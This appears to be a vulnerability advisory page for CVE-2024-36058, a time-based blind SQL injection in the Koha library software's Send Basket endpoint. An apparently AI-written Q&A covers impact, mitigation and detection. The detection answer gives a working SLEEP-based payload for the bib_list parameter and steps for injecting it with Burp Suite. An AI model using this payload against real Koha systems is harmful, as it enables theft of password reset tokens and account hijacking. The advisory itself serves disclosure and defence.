CVE-2024-36058
Time-Based SQL Injection in Koha Send Basket Allows Data Exposure
Publication date: 2026-04-07
Last updated on: 2026-04-09
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| koha | koha | to 23.05.10 (exc) |
| koha | library | to 22.05.22 (exc) |
| koha | library | to 23.05.10 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability allows unauthorized access to sensitive data in the Koha Library database through a time-based blind SQL injection attack. Such unauthorized data exposure can lead to breaches of confidentiality and data protection requirements mandated by standards like GDPR and HIPAA.
Specifically, attackers can access sensitive information such as password reset tokens, which could lead to account hijacking and further unauthorized data disclosure. This compromises the integrity and confidentiality of personal data, potentially resulting in non-compliance with regulations that require protection of user data and prompt breach notification.
Can you explain this vulnerability to me?
CVE-2024-36058 is a time-based blind SQL injection vulnerability in the Koha Library Software versions prior to 22.05.22. It exists in the Send Basket functionality at the endpoint opac/opac-sendbasket.pl, specifically in the bib_list POST parameter.
The vulnerability occurs because the bib_list parameter is not properly sanitized before being used in an SQL query. This allows an authenticated, low-privilege library user to inject arbitrary SQL commands that cause the database to delay its response time.
By measuring these delays, an attacker can perform blind SQL injection to extract sensitive data from the database without directly seeing the query results.
How can this vulnerability impact me? :
This vulnerability allows an authenticated user with low privileges to read arbitrary data from the database by exploiting the time-based SQL injection.
- Unauthorized access to sensitive information such as password reset tokens.
- Potential hijacking of other user accounts using stolen credentials or tokens.
- Exposure of confidential or private data stored in the database.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by sending a specially crafted POST request to the endpoint opac-sendbasket.pl with a payload in the bib_list parameter that triggers a database sleep command, causing a measurable delay in the server's response time.
For example, an authenticated user can log in, add a book to the basket, intercept the Send Basket request using a proxy tool like Burp Suite, and inject a payload such as: 1) AND (SELECT 1 FROM (SELECT(SLEEP(36)))x)-- - into the bib_list parameter.
If the server response is delayed by the expected interval (e.g., 36 seconds), this confirms the presence of the time-based blind SQL injection vulnerability.
What immediate steps should I take to mitigate this vulnerability?
To mitigate the vulnerability, immediately upgrade Koha Library Software to version 22.05.22 or later, where the issue has been addressed.
Until the upgrade can be performed, restrict access to the Send Basket functionality to trusted users only and monitor for unusual activity involving the bib_list parameter.
Additionally, consider using web application firewalls or input validation proxies to detect and block suspicious POST requests targeting the bib_list parameter.